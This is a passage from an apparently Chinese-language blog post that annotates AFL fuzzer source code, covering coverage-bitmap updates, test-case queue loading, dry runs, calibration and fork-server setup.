%r10\\n&quot;&quot; movq 64(%rsp), %r11\\n&quot;&quot;\\n&quot;&quot; movq 96(%rsp), %xmm0\\n&quot;&quot; movq 112(%rsp), %xmm1\\n&quot;&quot; movq 128(%rsp), %xmm2\\n&quot;&quot; movq 144(%rsp), %xmm3\\n&quot;&quot; movq 160(%rsp), %xmm4\\n&quot;&quot; movq 176(%rsp), %xmm5\\n&quot;&quot; movq 192(%rsp), %xmm6\\n&quot;&quot; movq 208(%rsp), %xmm7\\n&quot;&quot; movq 224(%rsp), %xmm8\\n&quot;&quot; movq 240(%rsp), %xmm9\\n&quot;&quot; movq 256(%rsp), %xmm10\\n&quot;&quot; movq 272(%rsp), %xmm11\\n&quot;&quot; movq 288(%rsp), %xmm12\\n&quot;&quot; movq 304(%rsp), %xmm13\\n&quot;&quot; movq 320(%rsp), %xmm14\\n&quot;&quot; movq 336(%rsp), %xmm15\\n&quot;&quot;\\n&quot;&quot; leaq 352(%rsp), %rsp\\n&quot;&quot;\\n&quot;&quot; jmp __afl_store\\n&quot;&quot;\\n&quot;&quot;__afl_die:\\n&quot;&quot;\\n&quot;&quot; xorq %rax, %rax\\n&quot;CALL_L64(&quot;_exit&quot;) __afl_store __afl_store 用来更新bitmap状态 1234567891011121314 &quot;__afl_store:\\n&quot; &quot;\\n&quot; &quot; /* Calculate and store hit for the code location specified in rcx. */\\n&quot; &quot;\\n&quot;#ifndef COVERAGE_ONLY &quot; xorq __afl_prev_loc(%rip), %rcx\\n&quot; &quot; xorq %rcx, __afl_prev_loc(%rip)\\n&quot; &quot; shrq $1, __afl_prev_loc(%rip)\\n&quot;#endif /* ^!COVERAGE_ONLY */ &quot;\\n&quot;#ifdef SKIP_COUNTS &quot; orb $1, (%rdx, %rcx, 1)\\n&quot;#else &quot; incb (%rdx, %rcx, 1)\\n&quot; 此处笔者其实还没有完全理解，这里的rcx实际上是trampoline中送来的标识每一个基本块的随机id，此处的代码用随机id异或上一个运行的桩的随机id来作为当前块在bitmap里的offset，并将此offset处的计数加一，用来表示对应的基本块运行了一次，同时，将此id存入 __afl_prev_loc 使用，记录为上一次桩的随机id，并右移一位。 这里offset是怎么保证不重复的呢，笔者感觉应该是跟线性同余随机算法的特性有关，不过由于不是笔者的重点，所以笔者暂且不过多探究。 afl-fuzz | 一次fuzz的标准流程 全局变量 首先是bitmap相关 12345EXP_ST u8 *trace_bits; // 和子进程共享的bitmap，程序运行的结果就存在于此bitmap中EXP_ST u8 virgin_bits[MAP_SIZE], // 标记仍然没有被触及到的区域 virgin_tmout[MAP_SIZE], // 标记还没有出现在tmout的区域 virgin_crash[MAP_SIZE]; // 标记还没有出现在crash的区域 然后是testcase组成的队列，每一个testcase会在初始化时被初始化为queue中的一个实体 123456789101112131415161718192021222324252627282930313233struct queue_entry&#123; u8 *fname; /* File name for the test case */ u32 len; /* Input length */ u8 cal_failed, /* Calibration failed? */ trim_done, /* Trimmed? */ was_fuzzed, /* Had any fuzzing done yet? */ passed_det, /* Deterministic stages passed? */ has_new_cov, /* Triggers new coverage? */ var_behavior, /* Variable behavior? */ favored, /* Currently favored? */ fs_redundant; /* Marked as redundant in the fs? */ u32 bitmap_size, /* Number of bits set in bitmap */ exec_cksum; /* Checksum of the execution trace */ u64 exec_us, /* Execution time (us) */ handicap, /* Number of queue cycles behind */ depth; /* Path depth */ u8 *trace_mini; /* Trace bytes, if kept */ u32 tc_ref; /* Trace bytes ref count */ struct queue_entry *next, /* Next element, if any */ *next_100; /* 100 elements ahead */&#125;;static struct queue_entry *queue, /* Fuzzing queue (linked list) */ *queue_cur, // 当前处理的testscase *queue_top, // testcase list的顶部 *q_prev100; // 前100标记 然后是与queue相关的一些变量 12345678910111213141516EXP_ST u32 queued_paths, // queued_variable, // 存在可变区域的testcase的数量 queued_at_start, // testcase 的初始数量 queued_discovered, // 运行时发现的数量 queued_imported, // 通过-S引入的数量 queued_favored, // favored_queue 的数量 queued_with_cov, // 存在新覆盖的queue的数量 pending_not_fuzzed, // 还没有被fuzz的数量 pending_favored, // 还没有被fuzz的favored_queue的数量 cur_skipped_paths, /* Abandoned inputs in cur cycle */ cur_depth, /* Current path depth */ max_depth, /* Max path depth */ useless_at_start, /* Number of useless starting paths */ var_byte_count, /* Bitmap bytes with var behavior */ current_entry, /* Current queue entry ID */ havoc_div = 1; /* Cycle count divisor for havoc */ main fuzz的开始是对于参数的解析 123456789case &#x27;i&#x27;: /* input dir */ if (in_dir) FATAL(&quot;Multiple -i options not supported&quot;); in_dir = optarg; if (!strcmp(in_dir, &quot;-&quot;)) in_place_resume = 1; break; .... 在完成参数的解析后， 开始设置对应的信号处理的handle, 这一部分将在之后进行分析 1setup_signal_handlers(); 以及检查ASAN参数 1check_asan_opts(); 然后开始对应环境变量的解析 123456789101112131415161718192021222324252627282930313233if (sync_id) fix_up_sync();if (!strcmp(in_dir, out_dir)) FATAL(&quot;Input and output directories can&#x27;t be the same&quot;);if (dumb_mode) &#123; if (crash_mode) FATAL(&quot;-C and -n are mutually exclusive&quot;); if (qemu_mode) FATAL(&quot;-Q and -n are mutually exclusive&quot;);&#125;if (getenv(&quot;AFL_NO_FORKSRV&quot;)) no_forkserver = 1;if (getenv(&quot;AFL_NO_CPU_RED&quot;)) no_cpu_meter_red = 1;if (getenv(&quot;AFL_NO_ARITH&quot;)) no_arith = 1;if (getenv(&quot;AFL_SHUFFLE_QUEUE&quot;)) shuffle_queue = 1;if (getenv(&quot;AFL_FAST_CAL&quot;)) fast_cal = 1;if (getenv(&quot;AFL_HANG_TMOUT&quot;)) &#123; hang_tmout = atoi(getenv(&quot;AFL_HANG_TMOUT&quot;)); if (!hang_tmout) FATAL(&quot;Invalid value of AFL_HANG_TMOUT&quot;);&#125;if (dumb_mode == 2 &amp;&amp; no_forkserver) FATAL(&quot;AFL_DUMB_FORKSRV and AFL_NO_FORKSRV are mutually exclusive&quot;);if (getenv(&quot;AFL_PRELOAD&quot;)) &#123; setenv(&quot;LD_PRELOAD&quot;, getenv(&quot;AFL_PRELOAD&quot;), 1); setenv(&quot;DYLD_INSERT_LIBRARIES&quot;, getenv(&quot;AFL_PRELOAD&quot;), 1);&#125;if (getenv(&quot;AFL_LD_PRELOAD&quot;)) FATAL(&quot;Use AFL_PRELOAD instead of AFL_LD_PRELOAD&quot;); 对于此处涉及到的环境变量将在后面一一说明 接下来将原来的命令行参数保存起来 1save_cmdline(argc, argv); 设置用户态banner 1fix_up_banner(argv[optind]); 检查是否在tty模式下运行 1check_if_tty(); 获取核心数 1get_core_count(); 如果设置了 AFFINITY 123#ifdef HAVE_AFFINITY bind_to_free_cpu();#endif /* HAVE_AFFINITY */ 然后是一些对于机器和架构的检查 12check_crash_handling();check_cpu_governor(); 设置postprocessor 1setup_post(); 设置共享内存用于消息的传递 1setup_shm(); 对于class16数据进行分类 1init_count_class16(); 为输出文件设置dir以及fd 1setup_dirs_fds(); 读取初始测试用例 12read_testcases();load_auto(); 对输入目录进行一些处理 1pivot_inputs(); 接下来又是一连串的处理 123456789101112131415161718if (extras_dir) load_extras(extras_dir);// 如果设置了extras，那么加载extras// 类似于字典if (!timeout_given) find_timeout();// 如果设置了timeout，设置给定timeoutdetect_file_args(argv + optind + 1);// 检查运行参数，找到@@if (!out_file) setup_stdio_file();// 设置输出文件check_binary(argv[optind]);// 检查目标程序start_time = get_cur_time();// 设置起始时间if (qemu_mode)// 如果使用了qemu_mode use_argv = get_qemu_argv(argv[0], argv + optind, argc - optind);else use_argv = argv + optind; 对于输入进行试运行，确保所有输入符合预期 接下来cull_queue，在之后继续分析 1cull_queue(); 1234show_init_stats();// 输出初始状态seek_to = find_start_position();// 针对resume状态而言，快速回复到终止位置 1234write_stats_file(0, 0, 0);// 将初始状态保存在stat文件中save_auto();// 保存自动生成的extras 接下来是针对stop的处理 12345678if (stop_soon) goto stop_fuzzing;if (!not_on_tty) &#123; sleep(4); start_time += 4000; if (stop_soon) goto stop_fuzzing;&#125; 然后正式进入fuzz循环 在循环前还要cull_queue 一次 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960 while (1) &#123; u8 skipped_fuzz; cull_queue();// 再次进行cull_queue 操作 if (!queue_cur) &#123; queue_cycle++; current_entry = 0; cur_skipped_paths = 0; queue_cur = queue; while (seek_to) &#123; current_entry++; seek_to--; queue_cur = queue_cur-&gt;next; &#125; // 当存在seek_to时，直接跳到对应的testcase show_stats(); if (not_on_tty) &#123; ACTF(&quot;Entering queue cycle %llu.&quot;, queue_cycle); fflush(stdout); &#125; /* If we had a full queue cycle with no new finds, try recombination strategies next. */ if (queued_paths == prev_queued) &#123; if (use_splicing) cycles_wo_finds++; else use_splicing = 1; &#125; else cycles_wo_finds = 0; prev_queued = queued_paths; if (sync_id &amp;&amp; queue_cycle == 1 &amp;&amp; getenv(&quot;AFL_IMPORT_FIRST&quot;)) sync_fuzzers(use_argv); &#125; skipped_fuzz = fuzz_one(use_argv);// 运行一次fuzz，并完成种子的变异阶段 if (!stop_soon &amp;&amp; sync_id &amp;&amp; !skipped_fuzz) &#123; if (!(sync_interval_cnt++ % SYNC_INTERVAL)) sync_fuzzers(use_argv); &#125; if (!stop_soon &amp;&amp; exit_1) stop_soon = 2; if (stop_soon) break; queue_cur = queue_cur-&gt;next; current_entry++; // 测试下一个种子 &#125; setup_shm | 基于共享内存的消息传递 这里是和fuzz对象子进程对应的设置共享内存，用来传递bitmap 12345678910111213141516171819202122232425262728293031EXP_ST void setup_shm(void) &#123; u8* shm_str; if (!in_bitmap) memset(virgin_bits, 255, MAP_SIZE); memset(virgin_tmout, 255, MAP_SIZE); memset(virgin_crash, 255, MAP_SIZE); shm_id = shmget(IPC_PRIVATE, MAP_SIZE, IPC_CREAT | IPC_EXCL | 0600); if (shm_id &lt; 0) PFATAL(&quot;shmget() failed&quot;); atexit(remove_shm); shm_str = alloc_printf(&quot;%d&quot;, shm_id); /* If somebody is asking us to fuzz instrumented binaries in dumb mode, we don&#x27;t want them to detect instrumentation, since we won&#x27;t be sending fork server commands. This should be replaced with better auto-detection later on, perhaps? */ if (!dumb_mode) setenv(SHM_ENV_VAR, shm_str, 1); ck_free(shm_str); trace_bits = shmat(shm_id, NULL, 0); if (trace_bits == (void *)-1) PFATAL(&quot;shmat() failed&quot;);&#125; 这里直接创建一个共享内存，同子进程forkserver中 __afl_global_area 指向的区域进行共享 对于testcase的预处理 主要包含三个函数： read_testcase: 从文件中读取testcases perform_dry_run: 对于testcase的试运行 cull_queue: 挑选更好的种子 read_testcases | 读取testcase 用来从文件中读取testcase 首先创建了一些局部变量 1234struct dirent **nl;s32 nl_cnt;u32 i;u8* fn; 找到queue文件夹: 1234fn = alloc_printf(&quot;%s/queue&quot;, in_dir);if (!access(fn, F_OK)) in_dir = fn; else ck_free(fn);ACTF(&quot;Scanning &#x27;%s&#x27;...&quot;, in_dir); 通过scandir获取字母序的目录文件 1nl_cnt = scandir(in_dir, &amp;nl, NULL, alphasort); 如果设置了shullle_queue，并且queue数量大于1，那就打乱此nl数组 12345if (shuffle_queue &amp;&amp; nl_cnt &gt; 1) &#123; ACTF(&quot;Shuffling queue...&quot;); shuffle_ptrs((void**)nl, nl_cnt);&#125; shuffle的逻辑也很简单，就是进行n次的随机交换 1234567891011121314static void shuffle_ptrs(void** ptrs, u32 cnt) &#123; u32 i; for (i = 0; i &lt; cnt - 2; i++) &#123; u32 j = i + UR(cnt - i); void *s = ptrs[i]; ptrs[i] = ptrs[j]; ptrs[j] = s; &#125;&#125; 接下来是一个大循环，用来对于testcase一个个进行初始化 12345678910111213141516171819202122232425262728293031323334353637383940414243 for (i = 0; i &lt; nl_cnt; i++) &#123; struct stat st; u8* fn = alloc_printf(&quot;%s/%s&quot;, in_dir, nl[i]-&gt;d_name); u8* dfn = alloc_printf(&quot;%s/.state/deterministic_done/%s&quot;, in_dir, nl[i]-&gt;d_name); // 首先找到两个对应文件 u8 passed_det = 0; free(nl[i]); /* not tracked */ // 然后释放文件nl对象内存 if (lstat(fn, &amp;st) || access(fn, R_OK)) PFATAL(&quot;Unable to access &#x27;%s&#x27;&quot;, fn);// 判断是否可以存在相应文件 /* This also takes care of . and .. */ if (!S_ISREG(st.st_mode) || !st.st_size || strstr(fn, &quot;/README.testcases&quot;)) &#123; // 剔除 &quot;.&quot;、&quot;..&quot; 和 README.testcases // 以及空文件 等无效文件 ck_free(fn); ck_free(dfn); continue; &#125; if (st.st_size &gt; MAX_FILE) FATAL(&quot;Test case &#x27;%s&#x27; is too big (%s, limit is %s)&quot;, fn, DMS(st.st_size), DMS(MAX_FILE)); // 如果testcase太大 /* Check for metadata that indicates that deterministic fuzzing is complete for this entry. We don&#x27;t want to repeat deterministic fuzzing when resuming aborted scans, because it would be pointless and probably very time-consuming. */ // 通过是否存在deterministic_done文件，来判断是否是resuming // 如果是resume，则跳过deterministic fuzz 阶段 if (!access(dfn, F_OK)) passed_det = 1; ck_free(dfn); // 将testcase添加进queue add_to_queue(fn, st.st_size, passed_det); &#125; 最后是收尾的一些处理： 12345678910111213141516free(nl); /* not tracked */if (!queued_paths)&#123; SAYF(&quot;\\n&quot; cLRD &quot;[-] &quot; cRST &quot;Looks like there are no valid test cases in the input directory! The fuzzer\\n&quot; &quot; needs one or more test case to start with - ideally, a small file under\\n&quot; &quot; 1 kB or so. The cases must be stored as regular files directly in the\\n&quot; &quot; input directory.\\n&quot;); FATAL(&quot;No usable test cases in &#x27;%s&#x27;&quot;, in_dir);&#125;last_path_time = 0;queued_at_start = queued_paths; add_to_queue 通过add_to_queue 将testcase加入queue 12345678910111213141516171819202122232425262728293031323334353637static void add_to_queue(u8* fname, u32 len, u8 passed_det) &#123; struct queue_entry* q = ck_alloc(sizeof(struct queue_entry)); q-&gt;fname = fname; q-&gt;len = len; q-&gt;depth = cur_depth + 1; q-&gt;passed_det = passed_det; // 设置queue的各个成员信息 if (q-&gt;depth &gt; max_depth) max_depth = q-&gt;depth; if (queue_top) &#123; queue_top-&gt;next = q; queue_top = q; &#125; else q_prev100 = queue = queue_top = q; // 将此queue_entry加入队列 // 将此queue_entry放入queue_top queued_paths++; // 增加queue路径 pending_not_fuzzed++; // 增加等待fuzz 计数 cycles_wo_finds = 0; /* Set next_100 pointer for every 100th element (index 0, 100, etc) to allow faster iteration. */ if ((queued_paths - 1) % 100 == 0 &amp;&amp; queued_paths &gt; 1) &#123; // q_prev100 是一个相对于普通queue间隔100的queue， // 用来快速访问 q_prev100-&gt;next_100 = q; q_prev100 = q; &#125; last_path_time = get_cur_time();&#125; 其中最核心的部分就是设置了两个queue perform_dry_run | 对于testcase的试运行 此函数会遍历queue中的每个个体，然后对于对应的testcase进行一下试运行，并根据运行结果先筛选出不合适的testcase。 首先创建了一些局部变量 123struct queue_entry *q = queue;u32 cal_failures = 0;u8 *skip_crashes = getenv(&quot;AFL_SKIP_CRASHES&quot;); 然后进入了一个循环 循环的开始是通过queue的文件名读取了输入用例 123456789101112131415161718192021while (q)&#123; u8 *use_mem; u8 res; s32 fd; u8 *fn = strrchr(q-&gt;fname, &#x27;/&#x27;) + 1; ACTF(&quot;Attempting dry run with &#x27;%s&#x27;...&quot;, fn); fd = open(q-&gt;fname, O_RDONLY); if (fd &lt; 0) PFATAL(&quot;Unable to open &#x27;%s&#x27;&quot;, q-&gt;fname); use_mem = ck_alloc_nozero(q-&gt;len); if (read(fd, use_mem, q-&gt;len) != q-&gt;len) FATAL(&quot;Short read from &#x27;%s&#x27;&quot;, q-&gt;fname); close(fd); 然后通过 calibrate_case 对testcase进行了处理并尝试运行 12res = calibrate_case(argv, q, use_mem, 0, 1);ck_free(use_mem); 根据运行结果进行相应错误处理 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153 if (res == crash_mode || res == FAULT_NOBITS) SAYF(cGRA &quot; len = %u, map size = %u, exec speed = %llu us\\n&quot; cRST, q-&gt;len, q-&gt;bitmap_size, q-&gt;exec_us); switch (res) &#123; case FAULT_NONE: // 如果没有错误，并且是queue的第一个testcase if (q == queue) check_map_coverage(); if (crash_mode) FATAL(&quot;Test case &#x27;%s&#x27; does *NOT* crash&quot;, fn); break; case FAULT_TMOUT: if (timeout_given) &#123; /* The -t nn+ syntax in the command line sets timeout_given to &#x27;2&#x27; and instructs afl-fuzz to tolerate but skip queue entries that time out. */ if (timeout_given &gt; 1) &#123; WARNF(&quot;Test case results in a timeout (skipping)&quot;); q-&gt;cal_failed = CAL_CHANCES; cal_failures++; break; &#125; SAYF(&quot;\\n&quot; cLRD &quot;[-] &quot; cRST &quot;The program took more than %u ms to process one of the initial test cases.\\n&quot; &quot; Usually, the right thing to do is to relax the -t option - or to delete it\\n&quot; &quot; altogether and allow the fuzzer to auto-calibrate. That said, if you know\\n&quot; &quot; what you are doing and want to simply skip the unruly test cases, append\\n&quot; &quot; &#x27;+&#x27; at the end of the value passed to -t (&#x27;-t %u+&#x27;).\\n&quot;, exec_tmout, exec_tmout); FATAL(&quot;Test case &#x27;%s&#x27; results in a timeout&quot;, fn); &#125; else &#123; SAYF(&quot;\\n&quot; cLRD &quot;[-] &quot; cRST &quot;The program took more than %u ms to process one of the initial test cases.\\n&quot; &quot; This is bad news; raising the limit with the -t option is possible, but\\n&quot; &quot; will probably make the fuzzing process extremely slow.\\n\\n&quot; &quot; If this test case is just a fluke, the other option is to just avoid it\\n&quot; &quot; altogether, and find one that is less of a CPU hog.\\n&quot;, exec_tmout); FATAL(&quot;Test case &#x27;%s&#x27; results in a timeout&quot;, fn); &#125; case FAULT_CRASH: if (crash_mode) break; if (skip_crashes) &#123; WARNF(&quot;Test case results in a crash (skipping)&quot;); q-&gt;cal_failed = CAL_CHANCES; cal_failures++; break; &#125; if (mem_limit) &#123; SAYF(&quot;\\n&quot; cLRD &quot;[-] &quot; cRST &quot;Oops, the program crashed with one of the test cases provided. There are\\n&quot; &quot; several possible explanations:\\n\\n&quot; &quot; - The test case causes known crashes under normal working conditions. If\\n&quot; &quot; so, please remove it. The fuzzer should be seeded with interesting\\n&quot; &quot; inputs - but not ones that cause an outright crash.\\n\\n&quot; &quot; - The current memory limit (%s) is too low for this program, causing\\n&quot; &quot; it to die due to OOM when parsing valid files. To fix this, try\\n&quot; &quot; bumping it up with the -m setting in the command line. If in doubt,\\n&quot; &quot; try something along the lines of:\\n\\n&quot;#ifdef RLIMIT_AS &quot; ( ulimit -Sv $[%llu &lt;&lt; 10]; /path/to/binary [...] &lt;testcase )\\n\\n&quot;#else &quot; ( ulimit -Sd $[%llu &lt;&lt; 10]; /path/to/binary [...] &lt;testcase )\\n\\n&quot;#endif /* ^RLIMIT_AS */ &quot; Tip: you can use http://jwilk.net/software/recidivm to quickly\\n&quot; &quot; estimate the required amount of virtual memory for the binary. Also,\\n&quot; &quot; if you are using ASAN, see %s/notes_for_asan.txt.\\n\\n&quot;#ifdef __APPLE__ &quot; - On MacOS X, the semantics of fork() syscalls are non-standard and may\\n&quot; &quot; break afl-fuzz performance optimizations when running platform-specific\\n&quot; &quot; binaries. To fix this, set AFL_NO_FORKSRV=1 in the environment.\\n\\n&quot;#endif /* __APPLE__ */ &quot; - Least likely, there is a horrible bug in the fuzzer. If other options\\n&quot; &quot; fail, poke &lt;lcamtuf@coredump.cx&gt; for troubleshooting tips.\\n&quot;, DMS(mem_limit &lt;&lt; 20), mem_limit - 1, doc_path); &#125; else &#123; SAYF(&quot;\\n&quot; cLRD &quot;[-] &quot; cRST &quot;Oops, the program crashed with one of the test cases provided. There are\\n&quot; &quot; several possible explanations:\\n\\n&quot; &quot; - The test case causes known crashes under normal working conditions. If\\n&quot; &quot; so, please remove it. The fuzzer should be seeded with interesting\\n&quot; &quot; inputs - but not ones that cause an outright crash.\\n\\n&quot;#ifdef __APPLE__ &quot; - On MacOS X, the semantics of fork() syscalls are non-standard and may\\n&quot; &quot; break afl-fuzz performance optimizations when running platform-specific\\n&quot; &quot; binaries. To fix this, set AFL_NO_FORKSRV=1 in the environment.\\n\\n&quot;#endif /* __APPLE__ */ &quot; - Least likely, there is a horrible bug in the fuzzer. If other options\\n&quot; &quot; fail, poke &lt;lcamtuf@coredump.cx&gt; for troubleshooting tips.\\n&quot;); &#125; FATAL(&quot;Test case &#x27;%s&#x27; results in a crash&quot;, fn); case FAULT_ERROR: FATAL(&quot;Unable to execute target application (&#x27;%s&#x27;)&quot;, argv[0]); case FAULT_NOINST: FATAL(&quot;No instrumentation detected&quot;); case FAULT_NOBITS: useless_at_start++; if (!in_bitmap &amp;&amp; !shuffle_queue) WARNF(&quot;No new instrumentation output, test case may be useless.&quot;); break; &#125; 结束了循环 最后进行了错误处理 12345678910111213141516if (cal_failures)&#123; if (cal_failures == queued_paths) FATAL(&quot;All test cases time out%s, giving up!&quot;, skip_crashes ? &quot; or crash&quot; : &quot;&quot;); WARNF(&quot;Skipped %u test cases (%0.02f%%) due to timeouts%s.&quot;, cal_failures, ((double)cal_failures) * 100 / queued_paths, skip_crashes ? &quot; or crashes&quot; : &quot;&quot;); if (cal_failures * 5 &gt; queued_paths) WARNF(cLRD &quot;High percentage of rejected test cases, check settings!&quot;);&#125;OKF(&quot;All test cases processed.&quot;); calibrate_case 用来运行一次fuzz目标程序，并且记录fuzz运行的结果，用来校准对应的testcase 首先创建了一些局部变量 1234567891011121314static u8 calibrate_case(char **argv, struct queue_entry *q, u8 *use_mem, u32 handicap, u8 from_queue)&#123; static u8 first_trace[MAP_SIZE]; u8 fault = 0, new_bits = 0, var_detected = 0, hnb = 0, first_run = (q-&gt;exec_cksum == 0); u64 start_us, stop_us; s32 old_sc = stage_cur, old_sm = stage_max; u32 use_tmout = exec_tmout; u8 *old_sn = stage_name; 然后判断testcase时是否来自queue，或者是否是resume一个fuzz job，也即，是否是一个已经运行过一次的fuzz，然后再接着运行，如果是，则更新use_tmout 1234if (!from_queue || resuming_fuzz) use_tmout = MAX(exec_tmout + CAL_TMOUT_ADD, exec_tmout * CAL_TMOUT_PERC / 100); // 提升tmout的值 更新cal_failed 的值 1q-&gt;cal_failed++; 1234stage_name = &quot;calibration&quot;;// 更新stage_name stage_max = fast_cal ? 3 : CAL_CYCLES;// 设置cal的最大论数，如果需要fast_cal则设置最大3论 确保没有forkserver并且非dump_mode时，创建一个forkserver 12if (dumb_mode != 1 &amp;&amp; !no_forkserver &amp;&amp; !forksrv_pid) init_forkserver(argv); 什么是dump_mode呢？ dump_mode即没有插桩和确定性(deterministic)变异阶段的模式 q-&gt;exec_cksum 初始时为0，因此此处是用来判断是否是初次运行 virgin_bits是一个bitmap，用来记录没有触及的block 12345678910if (q-&gt;exec_cksum)&#123; // 如果不是初次运行 memcpy(first_trace, trace_bits, MAP_SIZE); hnb = has_new_bits(virgin_bits); if (hnb &gt; new_bits) new_bits = hnb; // 更新new_bits数&#125; 设置起始时间 1start_us = get_cur_time_us(); 接下来进入循环轮次: 这里的可变分支，指的是，对于同样的输入，可能可以到达也可能不能到达的分支。 在循环中，通过 run_target 真正让目标程序开始运行， 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263 for (stage_cur = 0; stage_cur &lt; stage_max; stage_cur++) &#123;// 循环轮次由前面的代码确定 u32 cksum; if (!first_run &amp;&amp; !(stage_cur % stats_update_freq)) show_stats(); // 如果不是第一次运行 并且state_cur 隔 stats_update_freq 次 // 则show_stats write_to_testcase(use_mem, q-&gt;len); // 将testcase写入out_file fault = run_target(argv, use_tmout); // 运行目标程序 /* stop_soon is set by the handler for Ctrl+C. When it&#x27;s pressed, we want to bail out quickly. */ if (stop_soon || fault != crash_mode) goto abort_calibration; // 如果收到终止signal if (!dumb_mode &amp;&amp; !stage_cur &amp;&amp; !count_bytes(trace_bits)) &#123; fault = FAULT_NOINST; goto abort_calibration; &#125; cksum = hash32(trace_bits, MAP_SIZE, HASH_CONST); // 计算bitmap的hash if (q-&gt;exec_cksum != cksum) &#123; // bitmap发生变化 // 一般在第一次运行，或者在同样的参数下，分支可变的情形 hnb = has_new_bits(virgin_bits); // 计算virgin_bits的更新 if (hnb &gt; new_bits) new_bits = hnb; if (q-&gt;exec_cksum) &#123; // 如果是分支可变的情形 u32 i; for (i = 0; i &lt; MAP_SIZE; i++) &#123; // 循环遍历，找到可变的region，如果找到了，就延长轮次 // 以便进行更多的遍历 if (!var_bytes[i] &amp;&amp; first_trace[i] != trace_bits[i]) &#123; var_bytes[i] = 1; stage_max = CAL_CYCLES_LONG; &#125; &#125; var_detected = 1; // 检测到可变 &#125; else &#123; // 如果是第一次运行 q-&gt;exec_cksum = cksum; memcpy(first_trace, trace_bits, MAP_SIZE); &#125; &#125; &#125; 增加总运行时间和轮次计算 1234stop_us = get_cur_time_us();total_cal_us += stop_us - start_us;total_cal_cycles += stage_max; 更新queue的相关成员 123456q-&gt;exec_us = (stop_us - start_us) / stage_max;// 平均每轮的执行时间q-&gt;bitmap_size = count_bytes(trace_bits);q-&gt;handicap = handicap;q-&gt;cal_failed = 0;// 将之前的设置的1还原为0，表示没有失败 还需要用 update_bitmap_score 更新bitmap的分数 1234total_bitmap_size += q-&gt;bitmap_size;total_bitmap_entries++;update_bitmap_score(q); 如果没有产生新bit 12if (!dumb_mode &amp;&amp; first_run &amp;&amp; !fault &amp;&amp; !new_bits) fault = FAULT_NOBITS; 进入最后的收尾的处理阶段 123456789101112131415161718192021222324252627282930313233343536abort_calibration: if (new_bits == 2 &amp;&amp; !q-&gt;has_new_cov) &#123; // has_new_bits在存在new bit下的返回值就是2 q-&gt;has_new_cov = 1; // 有新的覆盖率 queued_with_cov++; // 有新覆盖率的queue加一 &#125; /* Mark variable paths. */ if (var_detected) &#123; // 计算可变bytes的数量 var_byte_count = count_bytes(var_bytes); if (!q-&gt;var_behavior) &#123; // 如果可变 mark_as_variable(q); // 通过创建一个variable_behavior文件标记其可变 queued_variable++; &#125; &#125; // 恢复之前的stage相关的全局变量 stage_name = old_sn; stage_cur = old_sc; stage_max = old_sm; if (!first_run) show_stats(); return fault;&#125; init_forkserver 用来创建一个forkserver，避免频繁的execve 首先创建两个管道，st_pipe 和 ctl_pipe ， 分别用于传递状态和命令 123456789101112EXP_ST void init_forkserver(char **argv)&#123; static struct itimerval it; int st_pipe[2], ctl_pipe[2]; int status; s32 rlen; ACTF(&quot;Spinning up the fork server...&quot;); if (pipe(st_pipe) || pipe(ctl_pipe)) PFATAL(&quot;pipe() failed&quot;); 接下来通过fork产生一个子进程，父进程是fuzzer，子进程是forkserver 123forksrv_pid = fork(); if (forksrv_pid &lt; 0) PFATAL(&quot;fork() failed&quot;); 通过pid控制子进程进入如下if语句 1234567891011121314151617181920212223 if (!forksrv_pid) &#123; // 省略部分对于openbsd的特殊处理 setsid(); // 通过setsid使得子进程成为一个单独进程组 dup2(dev_null_fd, 1); dup2(dev_null_fd, 2); // 将标准输出和标准错误重定向到/dev/null // 如果没有设置输出文件 // 将标准输入重定向到此文件// 此处笔者还没有搞清楚为什么 if (out_file) &#123; dup2(dev_null_fd, 0); &#125; else &#123; dup2(out_fd, 0); close(out_fd); &#125; 接下来设置状态和控制管道的文件描述符 1234if (dup2(ctl_pipe[0], FORKSRV_FD) &lt; 0) PFATAL(&quot;dup2() failed&quot;);if (dup2(st_pipe[1], FORKSRV_FD + 1) &lt; 0) PFATAL(&quot;dup2() failed&quot;); 关闭多余描述符 123456789close(ctl_pipe[0]);close(ctl_pipe[1]);close(st_pipe[0]);close(st_pipe[1]);close(out_dir_fd);close(dev_null_fd);close(dev_urandom_fd);close(fileno(plot_file)); 设置延迟绑定 12if (!getenv(&quot;LD_BIND_LAZY&quot;)) setenv(&quot;LD_BIND_NOW&quot;, &quot;1&quot;, 0); 设置ASAN相关环境变量 12345setenv(&quot;ASAN_OPTIONS&quot;, &quot;abort_on_error=1:&quot; &quot;detect_leaks=0:&quot; &quot;symbolize=0:&quot; &quot;allocator_may_return_null=1&quot;, 0); 设置MSAN相关环境变量 123456setenv(&quot;MSAN_OPTIONS&quot;, &quot;exit_code=&quot; STRINGIFY(MSAN_ERROR) &quot;:&quot; &quot;symbolize=0:&quot; &quot;abort_on_error=1:&quot; &quot;allocator_may_return_null=1:&quot; &quot;msan_track_origins=0&quot;, 0); 通过execv执行子进程 1execv(target_path, argv); 此时之后目标程序的运行空间会覆盖当前运行时 如果execv失败，通知父进程 123 *(u32 *)trace_bits = EXEC_FAIL_SIG; exit(0);&#125; 子进程if结束 父进程通过状态管道读取四个字节，来判断子进程的开始，并针对性完成错误处理 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162 close(ctl_pipe[0]); close(st_pipe[1]); fsrv_ctl_fd = ctl_pipe[1]; fsrv_st_fd = st_pipe[0]; /* Wait for the fork server to come up, but don&#x27;t wait too long. */ it.it_value.tv_sec = ((exec_tmout * FORK_WAIT_MULT) / 1000); it.it_value.tv_usec = ((exec_tmout * FORK_WAIT_MULT) % 1000) * 1000; setitimer(ITIMER_REAL, &amp;it, NULL); rlen = read(fsrv_st_fd, &amp;status, 4); it.it_value.tv_sec = 0; it.it_value.tv_usec = 0; setitimer(ITIMER_REAL, &amp;it, NULL); /* If we have a four-byte &quot;hello&quot; message from the server, we&#x27;re all set. Otherwise, try to figure out what went wrong. */ if (rlen == 4) &#123; OKF(&quot;All right - fork server is up.&quot;); return; &#125; if (child_timed_out) FATAL(&quot;Timeout while initializing fork server (adjusting -t may help)&quot;); if (waitpid(forksrv_pid, 